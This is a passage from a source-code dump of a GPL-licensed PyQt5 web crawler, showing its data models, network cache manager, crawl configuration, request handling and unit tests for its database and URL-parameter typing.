self.parameters: 39 | raise KeyError("{} not found".format(parameter_name)) 40 | return ParameterType(self.parameters[parameter_name]['origin']) 41 | 42 | def toString(self): 43 | msg = "[Url: {} \n".format(self.path) 44 | for param in self.parameters: 45 | msg += "{} - {} - {} - {} \n".format(param, ParameterType(self.parameters[param]['parameter_type']), ParameterOrigin(self.parameters[param]['origin']), self.parameters[param]['generating']) 46 | msg += "Hash: {}]".format(self.url_hash) 47 | return msg 48 | 49 | class ParameterOrigin(Enum): 50 | ServerGenerated = 0 51 | ClientGenerated = 1 52 | 53 | -------------------------------------------------------------------------------- /crawler/models/utils.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from enum import Enum 19 | 20 | 21 | def levenshtein(s1, s2): 22 | if len(s1) < len(s2): 23 | return levenshtein(s2, s1) 24 | 25 | # len(s1) >= len(s2) 26 | if len(s2) == 0: 27 | return len(s1) 28 | 29 | previous_row = range(len(s2) + 1) 30 | for i, c1 in enumerate(s1): 31 | current_row = [i + 1] 32 | for j, c2 in enumerate(s2): 33 | insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer 34 | deletions = current_row[j] + 1 # than s2 35 | substitutions = previous_row[j] + (c1 != c2) 36 | current_row.append(min(insertions, deletions, substitutions)) 37 | previous_row = current_row 38 | 39 | return previous_row[-1] 40 | 41 | 42 | class CrawlSpeed(Enum): 43 | Slow = 0 44 | Medium = 1 45 | Fast = 2 46 | Speed_of_Lightning = 3 47 | 48 | 49 | def purge_dublicates(X): 50 | unique_X = [] 51 | for i, row in enumerate(X): 52 | if row not in X[i + 1:]: 53 | unique_X.append(row) 54 | return unique_X -------------------------------------------------------------------------------- /crawler/models/webpage.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | class WebPage: 19 | 20 | def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, base_url = None): 21 | self.id = id 22 | self.cookiejar = cookiesjar 23 | self.url = url 24 | self.html = html 25 | self.clickables = [] 26 | self.timing_requests = [] 27 | self.links = [] 28 | self.forms = [] 29 | self.current_depth = depth 30 | self.ajax_requests = [] 31 | self.base_url = None # Defines if a page contains a tag 32 | 33 | def toString(self): 34 | try: 35 | url = self.url.toString() 36 | except AttributeError: 37 | url = self.url 38 | msg = "[ Page: " + url + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) + " \n" 39 | if len(self.clickables) > 0: 40 | msg += "Clickable: \n" 41 | for elem in self.clickables: 42 | msg += elem.toString() + " \n" 43 | if len(self.timing_requests) > 0: 44 | msg += "Timingrequests: \n" 45 | for elem in self.timing_requests: 46 | msg += elem.toString() + " \n" 47 | if len(self.links) > 0: 48 | msg += "Static Links: \n" 49 | for link in self.links: 50 | tmp = link.toString() 51 | msg += tmp + " \n" 52 | if len(self.forms) > 0: 53 | msg += "Forms: \n" 54 | for elem in self.forms: 55 | msg += elem.toString() + " \n" 56 | if len(self.ajax_requests) > 0: 57 | msg += "Ajax-AsyncRequests: \n" 58 | for elem in self.ajax_requests: 59 | msg += elem.toString() + " \n" 60 | return msg + "]" 61 | -------------------------------------------------------------------------------- /crawler/network/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | -------------------------------------------------------------------------------- /crawler/network/network.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from PyQt5.Qt import QNetworkAccessManager, QDesktopServices, QNetworkDiskCache 19 | import logging 20 | from PyQt5.QtNetwork import QHttpMultiPart, QHttpPart 21 | 22 | 23 | class NetWorkAccessManager(QNetworkAccessManager): 24 | 25 | def __init__(self, parent, cache_size = 100, cache_dir='.webkit_cache'): 26 | super(NetWorkAccessManager, self).__init__(parent) 27 | self.finished.connect(self._finished) 28 | cache = QNetworkDiskCache() 29 | cache.setCacheDirectory(cache_dir) 30 | cache.setMaximumCacheSize(cache_size * 1024 * 1024) # need to convert cache value to bytes 31 | self.setCache(cache) 32 | 33 | def _finished(self, reply): 34 | reply.deleteLater() 35 | 36 | def createRequest(self, op, req, device=None): 37 | self.reply = None 38 | """ 39 | if op == 1: 40 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("Head",req.url().toString())) 41 | elif op == 2: 42 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("GET",req.url().toString())) 43 | elif op == 3: 44 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("PUT",req.url().toString())) 45 | elif op == 4: 46 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("POST",req.url().toString())) 47 | elif op == 5: 48 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("Delete",req.url().toString())) 49 | else: 50 | logging.debug("NetworkAccessManager: Request created - Operation: {}, Url: {}".format("CUSTOM",req.url().toString())) 51 | """ 52 | reply = QNetworkAccessManager.createRequest(self, op, req, device) 53 | #reply = NetworkReply(self, reply) 54 | return reply 55 | 56 | def __del__(self): 57 | self = None 58 | -------------------------------------------------------------------------------- /crawler/tests/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | __author__ = 'constantin' 19 | -------------------------------------------------------------------------------- /crawler/tests/databasetest.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import logging 19 | from copy import deepcopy 20 | from database.database import Database 21 | from models.ajaxrequest import AjaxRequest 22 | from models.clickable import Clickable 23 | from models.clickabletype import ClickableType 24 | from models.form import HtmlForm, FormInput 25 | from models.url import Url 26 | from models.webpage import WebPage 27 | 28 | __author__ = 'constantin' 29 | 30 | import unittest 31 | 32 | SESSION = 12345 33 | WEBPAGE_ID = 99 34 | TEST_URL1 = "http://example.com" 35 | TEST_URL2 = "http://example.com/exmaple.php" 36 | TEST_HTML = "" 37 | CLICKABLE = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3") 38 | WEBPAGE = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2) 39 | AJAXREQUEST = AjaxRequest("GET", TEST_URL1, CLICKABLE, parameters=["test=Test"]) 40 | 41 | 42 | class DataBaseTests(unittest.TestCase): 43 | 44 | def setUp(self): 45 | self.database = Database("DataBaseUnit") 46 | 47 | 48 | def test_url_set_and_get(self): 49 | url = Url(TEST_URL1, depth_of_finding=3) 50 | self.database.insert_url_into_db(SESSION, url) 51 | url2 = self.database.get_next_url_for_crawling(SESSION) 52 | self.assertEqual(url, url2) 53 | self.assertEqual(url2.depth_of_finding, 3) 54 | 55 | def test_url_visit(self): 56 | url1 = Url(TEST_URL1, depth_of_finding=3) 57 | url2 = Url(TEST_URL2, depth_of_finding=25) 58 | 59 | self.database.insert_url_into_db(SESSION, url1) 60 | self.database.insert_url_into_db(SESSION, url2) 61 | 62 | url3 = self.database.get_next_url_for_crawling(SESSION) 63 | self.database.visit_url(SESSION, url3, 25, 200) 64 | url4 = self.database.get_next_url_for_crawling(SESSION) 65 | 66 | self.assertEqual(url1, url3) 67 | self.assertEqual(url2, url4) 68 | 69 | def test_url_set(self): 70 | url1 = Url(TEST_URL1, depth_of_finding=3) 71 | url2 = Url(TEST_URL2, depth_of_finding=25) 72 | 73 | self.database.insert_url_into_db(SESSION, url1) 74 | self.assertEqual(self.database.urls.count(), 1) 75 | self.database.insert_url_into_db(SESSION, url1) 76 | self.assertEqual(self.database.urls.count(), 1) 77 | self.database.insert_url_into_db(SESSION, url2) 78 | self.assertEqual(self.database.urls.count(), 2) 79 | 80 | 81 | def test_clickables(self): 82 | clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3") 83 | self.database._insert_clickable_into_db(SESSION, WEBPAGE_ID, clickable1) 84 | 85 | clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID) 86 | self.assertEqual(len(clickables), 1) 87 | self.assertEqual(clickable1, clickables[0]) 88 | 89 | self.database.set_clickable_clicked(SESSION, WEBPAGE_ID, clickable1.dom_address, clickable1.event, clickable_depth=243, clickable_type=ClickableType.CreatesNewNavigatables) 90 | 91 | clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID) 92 | self.assertEqual(len(clickables), 1) 93 | clickable1.clicked = True 94 | clickable1.clickable_type = ClickableType.CreatesNewNavigatables 95 | self.assertEqual(clickable1, clickables[0]) 96 | 97 | def test_webpage(self): 98 | clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3") 99 | web_page = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2) 100 | web_page.clickables.extend([clickable1]) 101 | self.database.insert_page_into_db(SESSION, web_page) 102 | web_page1 = self.database.get_webpage_to_id_from_db(SESSION, 1) 103 | self.assertEqual(web_page.toString(), web_page1.toString()) 104 | web_page2 = self.database.get_webpage_to_url_from_db(SESSION, TEST_URL1) 105 | self.assertEqual(web_page.toString(), web_page2.toString()) 106 | 107 | def test_form1(self): 108 | form_input1 = FormInput("INPUT", "Username", input_type="text", values=None) 109 | form_input2 = FormInput("INPUT", "Password", input_type="password", values=None) 110 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None) 111 | 112 | self.database.insert_form(SESSION,form, WEBPAGE_ID) 113 | self.assertEqual(self.database.forms.count(), 1) 114 | form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID) 115 | self.assertEqual(form, form1[0]) 116 | self.assertEqual(form.toString(), form1[0].toString()) 117 | 118 | def test_similar_forms(self): 119 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"]) 120 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"]) 121 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None) 122 | self.database.insert_form(SESSION,form, WEBPAGE_ID) 123 | self.assertEqual(self.database.forms.count(), 1) 124 | 125 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"]) 126 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"]) 127 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None) 128 | self.database.insert_form(SESSION,form, WEBPAGE_ID) 129 | self.assertEqual(self.database.forms.count(), 1) 130 | 131 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas, Edgar"]) 132 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"]) 133 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None) 134 | self.database.insert_form(SESSION,form, WEBPAGE_ID) 135 | self.assertEqual(self.database.forms.count(), 1) 136 | 137 | 138 | expected_form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None) 139 | form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)[0] 140 | self.assertEqual(form1.toString(), expected_form.toString()) 141 | 142 | def test_not_similar_forms(self): 143 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"]) 144 | form_input2 = FormInput("INPUT", "Test3", input_type="text", values=["Mueller"]) 145 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None) 146 | self.database.insert_form(SESSION,form, WEBPAGE_ID) 147 | self.assertEqual(self.database.forms.count(), 1) 148 | 149 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"]) 150 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"]) 151 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None) 152 | self.database.insert_form(SESSION,form, WEBPAGE_ID) 153 | self.assertEqual(self.database.forms.count(), 2) 154 | 155 | def test_web_page_extend_ajax(self): 156 | web_page = deepcopy(WEBPAGE) 157 | clickable = deepcopy(CLICKABLE) 158 | web_page.clickables.extend([clickable]) 159 | self.database.insert_page_into_db(SESSION, web_page) 160 | ajax = deepcopy(AJAXREQUEST) 161 | self.database.extend_ajax_requests_to_webpage(SESSION, web_page, [ajax]) 162 | 163 | web_page.ajax_requests = [ajax] 164 | test_page = self.database.get_webpage_to_url_from_db(SESSION, web_page.url) 165 | self.assertEqual(web_page.toString(),test_page.toString()) 166 | self.assertEqual(web_page.ajax_requests[0], ajax) 167 | 168 | 169 | 170 | if __name__ == '__main__': 171 | unittest.main() 172 | -------------------------------------------------------------------------------- /crawler/tests/domainhandlertest.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from database.databasemanager import DatabaseManager 19 | from models.urlstructure import ParameterType 20 | from utils.domainhandler import DomainHandler 21 | from utils.user import User 22 | 23 | __author__ = 'constantin' 24 | 25 | import unittest 26 | 27 | 28 | class DomainHandlerTest(unittest.TestCase): 29 | 30 | def setUp(self): 31 | self.persistence_manager = DatabaseManager(User("DummyUser", 0)) 32 | self.domain_handler = DomainHandler("example.com", self.persistence_manager) 33 | 34 | def test_a_parameter_calculation(self): 35 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "a"), ParameterType.Char) 36 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "4"), ParameterType.Digit) 37 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "afd"), ParameterType.String) 38 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "1.5"), ParameterType.Float) 39 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "42342"), ParameterType.Integer) 40 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "a"), ParameterType.Char) 41 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "1"), ParameterType.Digit) 42 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "12"), ParameterType.Integer) 43 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "42.5"), ParameterType.Float) 44 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc"), ParameterType.AlphaNumerical) 45 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc123"), ParameterType.AlphaNumerical) 46 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "a"), ParameterType.AlphaNumerical) 47 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1"), ParameterType.Float) 48 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1.5"), ParameterType.Float) 49 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc"), ParameterType.AlphaNumerical) 50 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc123"), ParameterType.AlphaNumerical) 51 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17"), ParameterType.Float) 52 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17.5"), ParameterType.Float) 53 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "a"), ParameterType.AlphaNumerical) 54 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14"), ParameterType.Integer) 55 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14.5"), ParameterType.Float) 56 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "abc123"), ParameterType.AlphaNumerical) 57 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "a"), ParameterType.Char) 58 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "4"), ParameterType.Char) 59 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14"), ParameterType.AlphaNumerical) 60 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14.5"), ParameterType.AlphaNumerical) 61 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc"), ParameterType.AlphaNumerical) 62 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc123"), ParameterType.AlphaNumerical) 63 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "a"), ParameterType.String) 64 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc"), ParameterType.String) 65 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "1"), ParameterType.AlphaNumerical) 66 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "2.3"), ParameterType.AlphaNumerical) 67 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc123"), ParameterType.AlphaNumerical) 68 | 69 | 70 | def test_b_create_url_function(self): 71 | url = self.domain_handler.handle_url("http://example.com/test.php?a=5&b=abc") 72 | url_desc = self.persistence_manager.get_url_structure(url.url_hash) 73 | self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.String) 74 | self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit) 75 | self.assertEqual(url.get_values_to_parameter("a")[0], "5") 76 | self.assertEqual(url.get_values_to_parameter("b")[0], "abc") 77 | 78 | 79 | url = self.domain_handler.handle_url("test.php?a=7&b=abc123", "http://example.com") 80 | url_desc = self.persistence_manager.get_url_structure(url.url_hash) 81 | self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.AlphaNumerical) 82 | self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit) 83 | self.assertEqual(url.domain, "example.com") 84 | self.assertEqual(url.path, "/test.php") 85 | self.assertEqual(url.scheme, "http") 86 | self.assertEqual(len(url.parameters), 2) 87 | self.assertEqual(url.get_values_to_parameter("a")[0], "7") 88 | self.assertEqual(url.get_values_to_parameter("b")[0], "abc123") 89 | 90 | with self.assertRaises(KeyError): 91 | url.get_values_to_parameter("zzz") 92 | 93 | 94 | 95 | if __name__ == '__main__': 96 | unittest.main() 97 | -------------------------------------------------------------------------------- /crawler/utils/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' -------------------------------------------------------------------------------- /crawler/utils/asyncrequesthandler.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | import logging 18 | from models.asyncrequeststructure import AsyncRequestStructure 19 | from models.parametertype import ParameterType 20 | from utils.utils import calculate_new_parameter_type 21 | 22 | 23 | 24 | class AsyncRequestHandler(): 25 | 26 | def __init__(self, database_manager): 27 | self.database_manager = database_manager 28 | 29 | def handle_requests(self, web_page): 30 | for async_request in web_page.ajax_requests + web_page.timing_requests: 31 | request_hash = async_request.request_hash 32 | ajax_structure = self.database_manager.get_asyncrequest_structure(request_hash) 33 | if ajax_structure is None: 34 | new_parameters = {} 35 | parameters = async_request.parameters 36 | try: 37 | for key, value in parameters.items(): 38 | param_type = calculate_new_parameter_type(None, value) 39 | new_parameters[key] = {"parameter_type": param_type.value} 40 | async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters) 41 | except AttributeError: 42 | async_request.request_structure = AsyncRequestStructure(request_hash, None) 43 | else: 44 | new_parameters = {} 45 | if async_request.parameters is not None: 46 | try: 47 | for key, value in async_request.parameters.items(): 48 | param_type = calculate_new_parameter_type(ParameterType(ajax_structure.parameters[key]['parameter_type']), value) 49 | new_parameters[key] = {"parameter_type": param_type.value} 50 | async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters) 51 | except AttributeError: 52 | logging.error("AttributeError with request: {}, Key: {}, Value: {}".format(request_hash, key, value)) 53 | async_request.request_structure = ajax_structure 54 | except KeyError: 55 | logging.debug("KeyError with request: {}, Key: {}, Value: {}".format(request_hash, key, value)) 56 | async_request.request_structure = ajax_structure 57 | else: 58 | async_request.request_structure = ajax_structure 59 | return web_page 60 | 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /crawler/utils/config.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | 17 | This class contains everything that is important for a crawl session: 18 | - name 19 | - start_page - is the start page, where the crawler should start 20 | - max_depth - How deep the crawler should go 21 | - max_click_depth - How deep a crawler should click 22 | - speed - interaction speed between Jäk and JS 23 | 24 | ''' 25 | from models.utils import CrawlSpeed 26 | 27 | class CrawlConfig(): 28 | 29 | def __init__(self, name, start_page, max_depth = 5, max_click_depth = 5, crawl_speed=CrawlSpeed.Medium): 30 | self.name = name 31 | self.max_depth = max_depth 32 | self.max_click_depth = max_click_depth 33 | self.start_page_url = start_page 34 | self.process_speed = crawl_speed 35 | 36 | 37 | 38 | class AttackConfig(): 39 | """ 40 | Right now more a dummy than something usefull 41 | """ 42 | def __init__(self, start_page_url, crawl_speed=CrawlSpeed.Medium): 43 | attack = "XSS" 44 | self.start_page_url = start_page_url 45 | self.process_speed = crawl_speed 46 | 47 | -------------------------------------------------------------------------------- /crawler/utils/execptions.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | class LoginFormNotFound(Exception): 19 | def __init__(self, value): 20 | self.value = value 21 | def __str__(self): 22 | return repr(self.value) 23 | 24 | class PageNotFound(Exception): 25 | def __init__(self, value): 26 | self.value = value 27 | def __str__(self): 28 | return repr(self.value) 29 | 30 | class LoginFailed(Exception): 31 | def __init__(self, value): 32 | self.value = value 33 | def __str__(self): 34 | return repr(self.value) 35 | 36 | class ElementNotFound(Exception): 37 | def __init__(self, value): 38 | self.value = value 39 | def __str__(self): 40 | return repr(self.value) 41 | 42 | class DomainHandlerNotSet(Exception): 43 | def __init__(self, value): 44 | self.value = value 45 | def __str__(self): 46 | return repr(self.value) 47 | -------------------------------------------------------------------------------- /crawler/utils/requestor.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from time import time, sleep 19 | import logging 20 | 21 | from PyQt5.Qt import QEventLoop, QTimer, QUrl 22 | 23 | from core.interactioncore import InteractionCore 24 | from models.utils import CrawlSpeed 25 | 26 | 27 | class Requestor(InteractionCore): 28 | def __init__(self, parent, proxy, port, crawl_speed = CrawlSpeed.Medium): 29 | super(Requestor, self).__init__(parent, proxy, port, crawl_speed) 30 | self.app = parent.app 31 | 32 | def _loadFinished(self, resutl): 33 | #logging.debug("{} Subframes found".format(self.mainFrame().childFrames())) 34 | #logging.debug(self.mainFrame().toHtml()) 35 | pass 36 | 37 | def get(self, qurl, html=None, num_retries=1, delay = 10, timeout = 10): 38 | t1 = time() 39 | 40 | loop = QEventLoop() 41 | timer = QTimer() 42 | timer.setSingleShot(True) 43 | timer.timeout.connect(loop.quit) 44 | self.loadFinished.connect(loop.quit) 45 | if qurl: 46 | if html: 47 | self.setHtml(html, qurl) 48 | else: 49 | self.mainFrame().load(QUrl(qurl)) 50 | timer.start(timeout * 1000) 51 | loop.exec_() # delay here until download finished or timeout 52 | 53 | if timer.isActive(): 54 | # downloaded successfully 55 | timer.stop() 56 | self._wait(delay - (time() - t1)) 57 | parsed_html = self.mainFrame().toHtml() 58 | else: 59 | # did not download in time 60 | if num_retries > 0: 61 | logging.debug('Timeout - retrying') 62 | parsed_html = self.get(qurl, num_retries=num_retries-1, timerout=timeout, delay=delay) 63 | else: 64 | logging.debug('Timed out') 65 | parsed_html = '' 66 | self.mainFrame().setHtml(None) 67 | return parsed_html 68 | 69 | def _wait(self, timeout=1, pattern=None): 70 | """Wait for delay time 71 | """ 72 | deadline = time() + timeout 73 | while time() < deadline: 74 | sleep(0) 75 | self.app.processEvents() 76 | 77 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 78 | logging.debug("Console: " + message + " at: " + str(lineNumber)) 79 | 80 | def __del__(self): 81 | pass -------------------------------------------------------------------------------- /crawler/utils/user.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 